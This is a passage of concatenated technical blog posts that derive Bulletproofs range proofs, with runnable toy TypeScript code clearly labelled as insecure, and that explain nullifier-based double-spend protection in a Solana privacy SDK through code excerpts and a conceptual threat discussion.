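Because the check keys on the public inputs rather than the proof bytes, an agent cannot swap in a different recipient or amount after approval: changing either produces a key the wallet has never seen.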
## Further reading - [zera-sdk on GitHub](https://github.com/Dax911/zera-sdk) — the actual code - [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — origin - [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) - [Privacy's broadband moment](/blog/privacys_broadband_moment/) - [Model Context Protocol specification](https://modelcontextprotocol.io/specification) (Anthropic, current draft) - The MCP working-group meeting notes are on the spec repo and worth a quarterly skim --- # Range proofs in 80 lines: Pedersen commitments and a tiny Bulletproof Canonical: https://blog.skill-issue.dev/blog/range_proofs_in_80_lines/ Description: How a Bulletproof actually compresses a range proof to logarithmic size. Derive the inner-product argument from scratch, run a toy prover/verifier in the browser, and pick the right range-proof primitive for 2026. Published: 2026-04-08T16:00:00.000Z Tags: cryptography, bulletproofs, pedersen, range-proof, zk, phd, math import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx"; A confidential transaction has to prove one annoying little thing: that the hidden amount is non-negative and bounded. Without that, an attacker can mint coins out of thin air by committing to a "negative balance" that wraps around the field. The cryptographic primitive that does the proving is the **range proof**, and the question of which range proof to ship in 2026 is — surprisingly — still live. This post does three things: 1. Derives the inner-product argument that makes Bulletproofs short. 2. Walks an 80-line, runnable toy Bulletproof prover/verifier in the browser. 3. Maps the trade-offs between Bulletproofs, classical range proofs, and SNARK-based range proofs onto the deployment surface I keep hitting in [zera-sdk](/blog/zera_sdk_scaffolding/). 
It's a sibling piece to [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/). Read that one first if "Pedersen" still feels like a textbook word to you. This one assumes you know what `C = a·G + b·H` is and want to know what to do with it. ## What a range proof has to do The setup. A prover holds a value $v$ and a blinding factor $\gamma$, and publishes a Pedersen commitment $$ V = v \cdot G + \gamma \cdot H $$ with $G, H$ independent generators of an elliptic-curve group of prime order $q$. The hiding property of $V$ comes from $\gamma$ being uniformly random; the binding property comes from $G$ and $H$ being independent (no known $\beta$ with $H = \beta G$). The prover then wants to convince a verifier that $v$ lies in some range, typically $[0, 2^n)$ for $n = 32$ or $n = 64$. Crucially, $v$ stays hidden. The verifier learns *only* the fact that the committed value is in range. The naive proof of "$v \in [0, 2^n)$" is to commit bit-by-bit: write $v = \sum_{i=0}^{n-1} a_i \cdot 2^i$ with $a_i \in \{0,1\}$, commit to each $a_i$, and prove each $a_i (a_i - 1) = 0$. That works. It takes $O(n)$ commitments and $O(n)$ proof size, which is what Maxwell's Confidential Transactions shipped in 2015 (in Blockstream's Elements sidechain, not Bitcoin mainnet) and which is roughly **2.5 KB per transaction** at $n = 64$. [Bünz, Bootle, Boneh, Poelstra, Wuille, and Maxwell (2018)](https://eprint.iacr.org/2017/1066) — the Bulletproofs paper — got that down to about **672 bytes**, with no trusted setup, by replacing the linear blob with a logarithmic-size inner-product argument. The compression ratio is roughly 4× over the naive bit-commitment scheme, and it gets better as the range grows. ## The inner-product argument, derived The whole game in Bulletproofs is the inner-product argument (IPA). Forget range proofs for a paragraph. 
The IPA proves the following: **Statement.** Given commitments $P \in \mathbb{G}$ and $\mathbf{G}, \mathbf{H} \in \mathbb{G}^n$, plus a scalar $c \in \mathbb{F}_q$, the prover knows vectors $\mathbf{a}, \mathbf{b} \in \mathbb{F}_q^n$ such that $$ P = \langle \mathbf{a}, \mathbf{G} \rangle + \langle \mathbf{b}, \mathbf{H} \rangle \quad \text{and} \quad \langle \mathbf{a}, \mathbf{b} \rangle = c. $$ The naive proof is to send $\mathbf{a}$ and $\mathbf{b}$ — that's $2n$ scalars. The IPA gets it to $2 \log_2 n$ group elements plus two scalars. The trick is recursion. Split each vector in half: $\mathbf{a} = (\mathbf{a}_L \,|\, \mathbf{a}_R)$, same for $\mathbf{b}, \mathbf{G}, \mathbf{H}$. The prover sends two cross-terms: $$ L = \langle \mathbf{a}_L, \mathbf{G}_R \rangle + \langle \mathbf{b}_R, \mathbf{H}_L \rangle, \quad R = \langle \mathbf{a}_R, \mathbf{G}_L \rangle + \langle \mathbf{b}_L, \mathbf{H}_R \rangle. $$ The verifier responds with a random challenge $x \in \mathbb{F}_q^*$. Both parties then compute folded vectors of half the length: $$ \mathbf{a}' = x \cdot \mathbf{a}_L + x^{-1} \cdot \mathbf{a}_R, \quad \mathbf{b}' = x^{-1} \cdot \mathbf{b}_L + x \cdot \mathbf{b}_R, $$ and the verifier folds the generators in the dual direction: $$ \mathbf{G}' = x^{-1} \cdot \mathbf{G}_L + x \cdot \mathbf{G}_R, \quad \mathbf{H}' = x \cdot \mathbf{H}_L + x^{-1} \cdot \mathbf{H}_R. $$ The new commitment is $$ P' = x^2 \cdot L + P + x^{-2} \cdot R, $$ and you can check by direct expansion that $P' = \langle \mathbf{a}', \mathbf{G}' \rangle + \langle \mathbf{b}', \mathbf{H}' \rangle$ exactly when the original $P$ relation held. Recurse on $(\mathbf{a}', \mathbf{b}', \mathbf{G}', \mathbf{H}', P')$. After $\log_2 n$ rounds, the vectors are length 1 and the prover just sends the two remaining scalars. That's the entire IPA in seven lines of math. Total proof size: $2 \log_2 n$ group elements (the $L_i$ and $R_i$ from each round) + 2 final scalars. 
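The "check by direct expansion" above can be executed numerically. This sketch swaps group elements for scalars mod a small prime — so "$\cdot G$" becomes field multiplication; the algebra is identical, the hardness is gone — and confirms that $P' = x^2 L + P + x^{-2} R$ matches $\langle \mathbf{a}', \mathbf{G}' \rangle + \langle \mathbf{b}', \mathbf{H}' \rangle$ after one fold. All names are mine, not from any library.

```typescript
// One round of the IPA fold, over scalars mod Q instead of a curve group.
const Q = 2147483647n; // 2^31 - 1, a prime
const mod = (x: bigint) => ((x % Q) + Q) % Q;
const mul = (a: bigint, b: bigint) => mod(a * b);
const add = (a: bigint, b: bigint) => mod(a + b);
const dot = (a: bigint[], b: bigint[]) =>
  a.reduce((s, ai, i) => add(s, mul(ai, b[i])), 0n);
const inv = (a: bigint): bigint => {
  // Fermat inverse: a^(Q-2) mod Q
  let r = 1n, base = mod(a), e = Q - 2n;
  while (e > 0n) { if (e & 1n) r = mul(r, base); base = mul(base, base); e >>= 1n; }
  return r;
};

function foldOnce(a: bigint[], b: bigint[], G: bigint[], H: bigint[], x: bigint) {
  const h = a.length / 2, xi = inv(x);
  const lo = <T,>(v: T[]) => v.slice(0, h);
  const hi = <T,>(v: T[]) => v.slice(h);
  const comb = (u: bigint[], w: bigint[], cu: bigint, cw: bigint) =>
    u.map((ui, i) => add(mul(cu, ui), mul(cw, w[i])));
  // Cross terms and folded vectors, exactly as in the derivation above.
  const L = add(dot(lo(a), hi(G)), dot(hi(b), lo(H)));
  const R = add(dot(hi(a), lo(G)), dot(lo(b), hi(H)));
  return {
    L, R,
    a: comb(lo(a), hi(a), x, xi),   // a' = x·aL + x⁻¹·aR
    b: comb(lo(b), hi(b), xi, x),   // b' = x⁻¹·bL + x·bR
    G: comb(lo(G), hi(G), xi, x),   // G' = x⁻¹·GL + x·GR
    H: comb(lo(H), hi(H), x, xi),   // H' = x·HL + x⁻¹·HR
  };
}

// Check P' = x²·L + P + x⁻²·R equals ⟨a',G'⟩ + ⟨b',H'⟩ for arbitrary inputs.
const a = [3n, 5n, 7n, 11n], b = [2n, 4n, 6n, 8n];
const G = [13n, 17n, 19n, 23n], H = [29n, 31n, 37n, 41n];
const x = 12345n, x2 = mul(x, x), xi2 = inv(x2);
const P = add(dot(a, G), dot(b, H));
const f = foldOnce(a, b, G, H, x);
const Pprime = add(add(mul(x2, f.L), P), mul(xi2, f.R));
const check = add(dot(f.a, f.G), dot(f.b, f.H));
console.log(Pprime === check); // the identity holds for any nonzero challenge x
```

Since the identity is an algebraic consequence of the fold definitions, it holds for any vectors and any nonzero challenge — which is exactly why the verifier can pick $x$ at random after seeing $L$ and $R$.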
At $n = 64$, that's 12 group elements + 2 scalars ≈ 448 bytes at 32 bytes apiece.

<Mermaid chart={`graph TD
  S1[split into halves] --> X1[prover sends L_1, R_1]
  X1 --> C1[verifier sends challenge x_1]
  C1 --> F1[fold to length n/2]
  F1 --> R{length 1?}
  R -->|no| S1
  R -->|yes| F[send final a, b]
  F --> V[verifier checks single point]
`}/>

## From IPA to range proof in two reductions The range proof reduces to the IPA in two steps. **Step 1: bit decomposition as a vector identity.** Write $v = \langle \mathbf{a}_L, 2^{\mathbf{n}} \rangle$ where $\mathbf{a}_L \in \{0,1\}^n$ is the bit decomposition and $2^{\mathbf{n}} = (1, 2, 4, \dots, 2^{n-1})$. Define $\mathbf{a}_R = \mathbf{a}_L - \mathbf{1}^n$ (so each $a_{R,i} \in \{0, -1\}$). The conjunction "$v \in [0, 2^n)$" becomes the vector identities $$ \mathbf{a}_L \circ \mathbf{a}_R = \mathbf{0}^n, \quad \mathbf{a}_L - \mathbf{a}_R = \mathbf{1}^n, \quad \langle \mathbf{a}_L, 2^{\mathbf{n}} \rangle = v. $$ The first identity (Hadamard product is zero) is exactly the bit constraint $a_i (a_i - 1) = 0$ rewritten. **Step 2: collapse three vector identities to one inner product.** The verifier samples challenges $y, z$. The prover constructs polynomials $$ \mathbf{l}(X) = (\mathbf{a}_L - z \cdot \mathbf{1}^n) + \mathbf{s}_L \cdot X, $$ $$ \mathbf{r}(X) = \mathbf{y}^n \circ (\mathbf{a}_R + z \cdot \mathbf{1}^n + \mathbf{s}_R \cdot X) + z^2 \cdot 2^{\mathbf{n}}, $$ with $\mathbf{s}_L, \mathbf{s}_R$ random blinding vectors. The inner product $t(X) = \langle \mathbf{l}(X), \mathbf{r}(X) \rangle$ is a quadratic in $X$, and the constant term $t_0$ collapses to $$ t_0 = z^2 \cdot v + \delta(y, z), \quad \delta(y, z) = (z - z^2) \langle \mathbf{1}^n, \mathbf{y}^n \rangle - z^3 \langle \mathbf{1}^n, 2^{\mathbf{n}} \rangle. $$ The verifier knows $\delta(y, z)$ (it's all public scalars) and knows $V$ (the commitment to $v$), so it can check the $t_0$ equation against $V$. 
The prover then runs the IPA on $\mathbf{l}(x)$ and $\mathbf{r}(x)$ for a fresh challenge $x$, and *that* is what gets compressed to $\log_2 n$. The whole construction is one Pedersen commitment, two challenges, two polynomial-coefficient commitments, and an IPA. It fits in a paragraph and runs in a browser.

## The 80-line toy

This is a runnable Bulletproof-style range proof for $n = 4$ (so $v \in [0, 16)$). It is intentionally small. It uses scalar arithmetic in a tiny prime field instead of an elliptic-curve group, which means it demonstrates the *protocol shape* but provides zero cryptographic security. Read it for the algebra, not the hardness.

<Sandbox
  files={{
    "/index.ts": `
const Q = 2147483647n; // 2^31 - 1, a tiny prime field (toy only)
const N = 4;
const mod = (x: bigint) => ((x % Q) + Q) % Q;
const add = (a: bigint, b: bigint) => mod(a + b);
const sub = (a: bigint, b: bigint) => mod(a - b);
const mul = (a: bigint, b: bigint) => mod(a * b);

function inv(a: bigint): bigint {
  // Fermat: a^(Q-2) mod Q
  let r = 1n, base = mod(a), e = Q - 2n;
  while (e > 0n) {
    if (e & 1n) r = mul(r, base);
    base = mul(base, base);
    e >>= 1n;
  }
  return r;
}

const dot = (a: bigint[], b: bigint[]) =>
  a.reduce((s, ai, i) => add(s, mul(ai, b[i])), 0n);
const had = (a: bigint[], b: bigint[]) => a.map((ai, i) => mul(ai, b[i]));

// Fiat-Shamir: deterministic challenge from a transcript.
async function challenge(transcript: string): Promise<bigint> {
  const buf = new TextEncoder().encode(transcript);
  const h = await crypto.subtle.digest("SHA-256", buf);
  let x = 0n;
  for (const b of new Uint8Array(h)) x = (x << 8n) | BigInt(b);
  return mod(x) || 1n; // never zero
}

// PROVER -----------------------------------------------------------
async function prove(v: bigint) {
  if (v < 0n || v >= 1n << BigInt(N)) throw new Error("out of range");

  // Bit decomposition.
  const aL = Array.from({ length: N }, (_, i) => (v >> BigInt(i)) & 1n);
  const aR = aL.map((b) => sub(b, 1n));
  const ones = new Array(N).fill(1n);
  const twos = Array.from({ length: N }, (_, i) => 1n << BigInt(i));

  // Sanity: aL . 2^n == v, aL o aR == 0, aL - aR == 1
  console.log("aL . 2^n =", dot(aL, twos), " (should be", v, ")");
  console.log("aL o aR =", had(aL, aR), " (should be all 0)");

  // Verifier challenges (Fiat-Shamir over the public commitment v).
  const y = await challenge(\`y|\${v}\`);
  const z = await challenge(\`z|\${v}|\${y}\`);

  // y-vector
  const yN = Array.from({ length: N }, (_, i) => {
    let r = 1n;
    for (let k = 0; k < i; k++) r = mul(r, y);
    return r;
  });

  // l(x), r(x) at x=1 (one round of IPA — toy)
  const lVec = aL.map((a) => sub(a, z));
  const rVec = had(yN, aR.map((a) => add(a, z)))
    .map((ri, i) => add(ri, mul(mul(z, z), twos[i])));

  // Inner product t = <l, r>
  const t = dot(lVec, rVec);

  // delta(y,z) = (z - z^2) <1, y^n> - z^3 <1, 2^n>
  const z2 = mul(z, z), z3 = mul(z2, z);
  const sum1y = dot(ones, yN), sum1_2n = dot(ones, twos);
  const delta = sub(mul(sub(z, z2), sum1y), mul(z3, sum1_2n));

  // The relation: t == z^2 * v + delta(y,z)
  const expected = add(mul(z2, v), delta);

  return { t, expected, lVec, rVec, y, z };
}

// VERIFIER ---------------------------------------------------------
function verify(p: Awaited<ReturnType<typeof prove>>) {
  const ok1 = p.t === p.expected;
  const ok2 = dot(p.lVec, p.rVec) === p.t;
  return { ok1, ok2, ok: ok1 && ok2 };
}

// IPA fold (one round, demonstrating the recursion pattern) --------
function ipaFoldOnce(a: bigint[], b: bigint[], x: bigint) {
  const half = a.length / 2;
  const xi = inv(x);
  const aP = a.slice(0, half).map((v, i) => add(mul(x, v), mul(xi, a[half + i])));
  const bP = b.slice(0, half).map((v, i) => add(mul(xi, v), mul(x, b[half + i])));
  // The cross terms L, R have the same inner product as the original.
  return { aP, bP };
}

// DEMO -------------------------------------------------------------
(async () => {
  const out = document.getElementById("out")!;
  const lines: string[] = [];

  for (const v of [0n, 7n, 15n]) {
    const p = await prove(v);
    const r = verify(p);
    lines.push(\`v=\${v.toString().padStart(2)} t=\${p.t.toString().slice(0, 18)}... ok=\${r.ok}\`);
  }

  // One-shot IPA fold to demonstrate the recursion shrinks the vectors.
  const a = [3n, 5n, 7n, 11n], b = [2n, 4n, 6n, 8n];
  const x = await challenge("ipa|demo");
  const folded = ipaFoldOnce(a, b, x);
  lines.push("");
  lines.push(\`ipa fold: a length \${a.length} -> \${folded.aP.length}\`);
  lines.push(\`          b length \${b.length} -> \${folded.bP.length}\`);

  // Out-of-range case should fail (negative -> wraps if we let it).
  try {
    await prove(-1n);
    lines.push("ERROR: prover accepted v=-1");
  } catch (e) {
    lines.push(\`prover rejected v=-1: \${(e as Error).message}\`);
  }

  out.textContent = lines.join("\\n");
})();
`,
    "/index.html": `<pre id="out">running...</pre>
`, }} /> The shape is the thing. A real Bulletproof replaces my BigInt scalars with elliptic-curve points (typically Ristretto or BN254 G1), runs the IPA recursively to length 1 instead of just one fold, and uses Fiat-Shamir over a transcript that includes every public group element. The protocol stays under 700 bytes for $n = 64$, and the verifier cost stays at $O(n)$ multiplications (the prover dominates at $O(n \log n)$). ## Choosing a range proof in 2026 The trade-off space has settled enough to write down honestly. The pattern: if you're already running a SNARK for the privacy proof, embed the range check inside it and pay nothing extra. If you don't have a SNARK and you want short proofs without a trusted setup, Bulletproofs are the right answer. The naive bit-commitment scheme is what you ship when you don't trust the cryptanalysis of either and you're willing to pay 2.5 KB per transaction. STARKs are aspirational for transfers and the right tool for rollups. In [zera-sdk](/blog/zera_sdk_scaffolding/), the range check on `amount` is a 64-bit decomposition inside the Groth16 transfer circuit. Cost: 64 R1CS constraints (one per bit), zero additional bytes on chain. The Bulletproof would have been 672 bytes per spend, which on Solana at 5,000 lamports per byte adds up faster than the constraint cost in the prover. ## What I'd reach for, and when The framing I keep coming back to: range proofs are a **feature** of a privacy system, not a product. The product is the privacy pool. The range proof exists because, without it, the pool is exploitable. Pick the one that disappears most quietly into the rest of your system. For [the unified shielded pool](/blog/pedersen_commitments_in_production/) on Solana, the SNARK-embedded approach wins for compute units and bytes. For a chain that doesn't already have a SNARK, Bulletproofs are the line where the cryptography costs roughly the same per-byte on chain as a multisig and you stop arguing about it. 
For anything post-quantum, STARKs are the only answer — the discrete-log assumption everything else here leans on collapses against a quantum adversary, and Bulletproofs go down with it. Bulletproofs greatly improve on the linear (in the bit length of the range) proof size of confidential transactions. They are also a drop-in replacement for the range proofs used in Monero and other confidential-transaction systems, requiring no trusted setup and relying only on the discrete-logarithm assumption. The 80-line toy at the top of this post is the entire algebraic core of the Bulletproofs paper, with the elliptic curve removed. Once you see that the inner-product argument is just *fold the vector in half, prove a smaller statement*, the rest of the construction is bookkeeping. ## Further reading - [Bulletproofs: Short Proofs for Confidential Transactions and More](https://eprint.iacr.org/2017/1066) — Bünz, Bootle, Boneh, Poelstra, Wuille, Maxwell (IEEE S&P 2018) — the original. - [Bulletproofs+: Shorter Proofs for a Privacy-Enhanced Distributed Ledger](https://eprint.iacr.org/2020/735) — Chung, Han, Hwang, Kim, Lee (2020) — the ~15% smaller refinement. - [dalek-cryptography/bulletproofs](https://github.com/dalek-cryptography/bulletproofs) — the canonical Rust implementation; constant-time, audited. - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — sister piece on what we're committing *to*. - [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — sister piece on the hash function inside our circuits. - [Privacy's broadband moment](/blog/privacys_broadband_moment/) — why these primitives shipped together in 2026. - [`Dax911/zera-sdk`](https://github.com/Dax911/zera-sdk) — production Rust implementation of the range-check-inside-Groth16 path. 
--- # Nullifiers without the witchcraft Canonical: https://blog.skill-issue.dev/blog/nullifiers_without_witchcraft/ Description: Nullifier Generation is on the ZERA front page next to Pedersen Commitments and Zero-Knowledge Proofs. The Rust + TypeScript implementations are six lines apiece. Here is what they actually do, and why the design borrows from Zcash. Published: 2026-04-02T15:30:00.000Z Tags: zera, cryptography, nullifier, poseidon, zcash, zk, solana The [zeralabs.org](https://zeralabs.org) front page lists three "Cryptographic Innovations": **Pedersen Commitments**, **Zero-Knowledge Proofs**, **Nullifier Generation**. I wrote about [the first one](/blog/pedersen_commitments_in_production/) already. The second one is what makes the protocol work at all — Groth16 over BN254, the fast lane that lets ZK leave the laboratory. This post is the third. Nullifier Generation sounds like a wizard's incantation. In practice, on a privacy chain, it is the most boring possible thing: a hash, with an exact and well-known input set, computed at exactly one moment in the lifecycle of a note. The reason it gets a top-line marketing slot is not because the math is exotic. It's because nullifiers are the entire reason a privacy pool can prevent double-spending without revealing which note got spent. They are the load-bearing trick. If you understand them, you understand UTXO-style ZK. ## What a nullifier is, in one sentence A nullifier is a hash of two things — a secret only the owner of a note knows, and the on-chain commitment of that note — published once, when the note is spent, so the chain can refuse a second spend without learning anything else about the note. That sentence has every piece. The owner has a secret. The chain has a commitment. The owner spends, reveals the hash of (secret, commitment), and the chain stamps "spent" next to that hash. If anyone else, ever, tries to spend the same note, they will produce the same hash. The chain notices and rejects. 
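That one sentence can be mocked in a few lines. This is an illustrative toy, not the SDK's code: `toyHash` stands in for Poseidon, and `spend`/`seenNullifiers` are names I made up for the sketch.

```typescript
// The chain's entire double-spend defense, as a toy: remember every
// nullifier ever published, reject repeats, learn nothing else.
const toyHash = (xs: bigint[]): bigint =>
  xs.reduce((acc, x) => (acc * 1000003n + x) % ((1n << 61n) - 1n), 17n);

const seenNullifiers = new Set<bigint>(); // the chain's only spend record

function spend(secret: bigint, commitment: bigint): "accepted" | "rejected" {
  // nullifier = H(secret, commitment): deterministic for the owner,
  // unpredictable for anyone without the secret.
  const nullifier = toyHash([secret, commitment]);
  if (seenNullifiers.has(nullifier)) return "rejected"; // same note, second try
  seenNullifiers.add(nullifier);
  return "accepted";
}
```

Note what the set stores: hashes, not notes. A second spend of the same note reproduces the same hash and bounces; the chain never learns which commitment any entry corresponds to.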
The reason this matters: in a transparent UTXO system (Bitcoin, original Solana SPL), the chain knows which UTXO got spent because it sees the input. In a shielded system, the chain doesn't know which note got spent — that's the whole point of the privacy layer — so we need a way for the chain to refuse double-spends *without learning the identity of the spent note*. Nullifiers are that way. ## The Zcash inheritance This is not a ZERA invention. The nullifier construction goes back to Zcash Sprout (2016) and the Sapling upgrade (2018), and the [Zcash protocol specification](https://zips.z.cash/protocol/protocol.pdf) is still the canonical reference. In Sapling, the nullifier of a note is `PRF^nf(nk, ρ)` where `nk` is the nullifier-deriving key (derived from the spending key material) and `ρ` is a per-note nonce derived from the note's commitment. The construction has two essential properties: 1. **Deterministic given the secret material.** The same note always produces the same nullifier, so a second spend is detectable. 2. **Unlinkable without the secret material.** An observer who sees the commitment cannot derive the nullifier; only the owner of the spending key can. ZERA's construction is the same idea, simplified for the deployment surface. Sapling has a richer key tree (`ask`/`nsk`/`nk`/`ovk`/`ivk`) because it ships viewing keys, expiry windows, and a separate proof-spend key. ZERA's MVP keeps the same roles inside one `secret` field per note. If the protocol grows a viewing-key abstraction (and it will — see the wallet's HKDF-derived viewing keys in [the v3 wallet post](/blog/zera_wallet_v3_zkp/)), the nullifier construction can absorb that without breaking, because the input set is `Poseidon(secret, commitment)` and `secret` is the part that gets specialised. ## The six lines of TypeScript Open [`packages/sdk/src/note.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.ts) in the SDK and search for `computeNullifier`. 
The whole function is:

```ts
/**
 * Compute the nullifier for spending a note.
 *
 *     nullifier = Poseidon(secret, commitment)
 */
export async function computeNullifier(
  secret: bigint,
  commitment: bigint,
): Promise<bigint> {
  return poseidonHash([secret, commitment]);
}
```

That's it. Two field elements in, one field element out, one Poseidon call in the middle. The accompanying tests in [`note.test.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.test.ts) are equally bare:

```ts
describe("computeNullifier", () => {
  it("returns a deterministic bigint", async () => {
    const note = createNote(100n, 1n);
    const commitment = await computeCommitment(note);
    const a = await computeNullifier(note.secret, commitment);
    const b = await computeNullifier(note.secret, commitment);
    expect(a).toBe(b);
  });

  it("different secrets produce different nullifiers", async () => {
    const note1 = createNote(100n, 1n);
    const note2 = createNote(100n, 1n);
    const commitment = await computeCommitment(note1);
    const n1 = await computeNullifier(note1.secret, commitment);
    const n2 = await computeNullifier(note2.secret, commitment);
    expect(n1).not.toBe(n2);
  });
});
```

The first test asserts determinism — same inputs, same output, every time. The second asserts independence — two notes with the same `(amount, asset)` but different secrets must produce different nullifiers, otherwise the privacy property collapses. The Rust mirror lives at [`crates/zera-core/src/note.rs`](https://github.com/Dax911/zera-sdk/blob/main/crates/zera-core/src/note.rs) — same shape, same Poseidon, same input order. The whole point of having two implementations under one cross-validated test vector ([see the cryptography doc](https://github.com/Dax911/zera-sdk/blob/main/docs/CRYPTOGRAPHY.md)) is that the host language never matters. JS in the wallet, Rust in the on-chain program, Rust-via-Neon in Node consumers — all three pipelines have to agree on the byte representation of `Poseidon(secret, commitment)`. 
They do, because the test vectors say so on every CI run.

## Why `secret` and `blinding` are different fields

The note struct from [`note.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.ts) has two random fields:

```ts
return {
  amount,
  asset,
  secret: randomFieldElement(),
  blinding: randomFieldElement(),
  memo: memo ?? [0n, 0n, 0n, 0n],
};
```

I noted this in [the Pedersen post](/blog/pedersen_commitments_in_production/) but it's worth restating in nullifier context: the `secret` is what the nullifier depends on. The `blinding` is what gives the *commitment* its hiding property. They are separated because they fail differently.

If `blinding` leaks (say, via a buggy memo encryption scheme), the worst case is that the commitment becomes enumerable for small `amount` spaces. Bad, but recoverable. If `secret` leaks, the nullifier becomes predictable, which means an attacker can stamp the chain with the nullifier *before* the legitimate owner does, and the legitimate spend gets rejected as a double-spend. This is the worst possible failure mode in a privacy pool: the note becomes unspendable.

Sampling them as independent 248-bit field elements means an attacker who compromises one does not get the other for free. The cost is ~62 bytes of additional state per note. The benefit is decorrelating the two failure modes that would otherwise chain.

## The lifecycle, in one diagram

```
1. CREATE (off-chain)
   note = createNote(amount, asset)
   ├── secret   = randomFieldElement()   // private, kept by owner
   └── blinding = randomFieldElement()   // private, kept by owner

2. COMMIT (on-chain, via deposit or transfer-output)
   commitment = Poseidon(amount, asset, secret, blinding, memo[0..3])
   --> commitment is appended to the on-chain Merkle tree at leafIndex

3. HOLD (off-chain, in the wallet)
   Owner stores { note, commitment, leafIndex, nullifier? } locally.
   Nullifier may be precomputed but is NOT yet on-chain.

4. SPEND (on-chain, via withdraw or transfer-input)
   nullifier = Poseidon(secret, commitment)
   proof = Groth16(
     public:  nullifier, root, recipientHash, amount, asset
     private: secret, blinding, memo, leafIndex, merkle_path
   )
   --> on-chain program checks:
       a. proof verifies under verifying_key
       b. nullifier_pda(nullifier) does not yet exist
       c. root matches a recent on-chain root
   --> if all pass, program creates nullifier_pda(nullifier).

5. REJECT (any future spend attempt with the same nullifier)
   nullifier_pda(nullifier) exists
   --> program returns "DoubleSpendDetected" without ever learning
       which note it was.
```

The reject step is the magic. The on-chain program does not know which note is being respent. It does not know which leaf in the Merkle tree the nullifier corresponds to. It only knows that a PDA seeded by the nullifier hash already exists, and it refuses to recreate it. From [`packages/sdk/src/pda.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/pda.ts), the seed shape is `["nullifier", nullifierBytes32]`:

```ts
export const NULLIFIER_SEED = "nullifier";
```

Each nullifier on the chain is a 32-byte BN254 field element packed into a PDA. PDAs are cheap on Solana, but they are not free, and the rent-exempt minimum balance for a tiny PDA is the actual cost of "stamping the chain with a nullifier." It is sub-cent on devnet and mainnet alike. That is the cost of double-spend protection in this design.

## What the circuit actually proves

The transfer circuit (one-input, two-output) and the withdraw circuit (one-input, one-recipient-hash) both compute the nullifier *inside the circuit* from the witness and assert equality with the public input.
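Before looking at the real prover input, here is a toy, off-circuit version of that recompute-and-compare check. `toyHash` is a stand-in for Poseidon and every name is illustrative; the real check runs as constraints inside the Groth16 circuit, not as TypeScript:

```typescript
// Off-circuit sketch: recompute commitment and nullifier from the private
// witness, then compare against the claimed public nullifier hash.
// `toyHash` is a stand-in for Poseidon; names are illustrative.
const toyHash = (xs: bigint[]): bigint =>
  xs.reduce((acc, x) => (acc * 131n + x) % (2n ** 61n - 1n), 7n);

interface Witness {
  amount: bigint;
  asset: bigint;
  secret: bigint;
  blinding: bigint;
  memo: bigint[];
}

function checkNullifierBinding(w: Witness, nullifierHash: bigint): boolean {
  const commitment = toyHash([w.amount, w.asset, w.secret, w.blinding, ...w.memo]);
  const nullifier = toyHash([w.secret, commitment]);
  return nullifier === nullifierHash; // the circuit asserts this equality
}

const w: Witness = { amount: 100n, asset: 1n, secret: 42n, blinding: 77n, memo: [0n, 0n, 0n, 0n] };
const good = toyHash([w.secret, toyHash([w.amount, w.asset, w.secret, w.blinding, ...w.memo])]);
console.log(checkNullifierBinding(w, good));      // true
console.log(checkNullifierBinding(w, good + 1n)); // false
```

The point of the sketch is the data flow: the nullifier is never an input the prover can choose freely; it is recomputed from `secret` and the commitment, so a mismatched public value simply fails.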
From [`packages/sdk/src/prover.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/prover.ts):

```ts
const input = {
  // Public
  root: tree.root.toString(),
  nullifierHash: nullifierHash.toString(),
  recipient: recipientHash.toString(),
  amount: note.amount.toString(),
  asset: note.asset.toString(),
  // Private
  secret: note.secret.toString(),
  // ...
};
```

The circuit's predicate, in pseudocode:

```
1. computed_commitment = Poseidon(amount, asset, secret, blinding, memo[0..3])
2. computed_nullifier  = Poseidon(secret, computed_commitment)
3. assert computed_nullifier == nullifierHash   (public input)
4. assert Merkle(root, leafIndex, path) == computed_commitment
5. assert amount, asset bind to public inputs
```

That's the whole privacy proof. The chain learns the nullifier and the new output commitments. It does not learn the amount inside, the asset, the original commitment, or the leaf index. The nullifier is the only piece of identifying information leaked, and the only thing it identifies is *itself* — there is no on-chain link from nullifier back to commitment without breaking the hash.

This is also why the `secret`-as-witness matters. If the nullifier could be derived from public information alone, anyone could replay it, and the privacy story would collapse. Because the secret is sampled per-note and is part of both the commitment witness and the nullifier preimage, only the holder of the secret can produce the proof. That binding is what stops one user from frontrunning another's spend.

## What an attack looks like, briefly

There are exactly two things an attacker can try, and they both lose.

**Attack 1: precompute someone's nullifier and stamp the chain first.** Requires `secret`. Without it, you can't compute `Poseidon(secret, commitment)`. The note's `secret` is sampled with 248 bits of CSPRNG entropy and reduced mod the BN254 prime, so brute force is not on the table.
Mitigation: the keystore in [the wallet](/blog/zera_wallet_v3_zkp/) keeps the secret in Rust, behind a ChaCha20-Poly1305 layer derived from an Argon2id-hardened password, and never lets it touch JavaScript.

**Attack 2: replay a nullifier from a previous valid spend.** This is the "spam the chain with old nullifiers" attack. It loses immediately, because the on-chain program checks for PDA existence on every spend, and an existing PDA is exactly the signal "this nullifier has been seen before, reject." There is no clever ordering that gets around this — PDA creation is monotonic: once a nullifier PDA exists, it is never deleted.

The thing that's not in the threat model: a global attacker who can correlate metadata about *when* spends happen. That's a network-layer problem, not a cryptographic one. Tor-style mixing, relayer rotation, and the [voucher / private-cash](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/voucher.ts) flow are all answers to that, and they are deliberately layered on top of the nullifier system rather than baked into it.

## Why this matters for the marketing pillar

[zeralabs.org](https://zeralabs.org) ships "Anti-Double Spending" as one of its six pillars, alongside True Offline Payments, Cryptographic Privacy, Perfect Divisibility, Secure Enclaves, and Solana Speed. Anti-Double Spending and Cryptographic Privacy *both* live or die on this construction. The pillar is real because the construction is real. It is not a stitched-together promise that turns into a complicated multi-party signing scheme later. It is one Poseidon hash and one PDA, and it has been the right answer since 2016. The boring answer is the right answer.

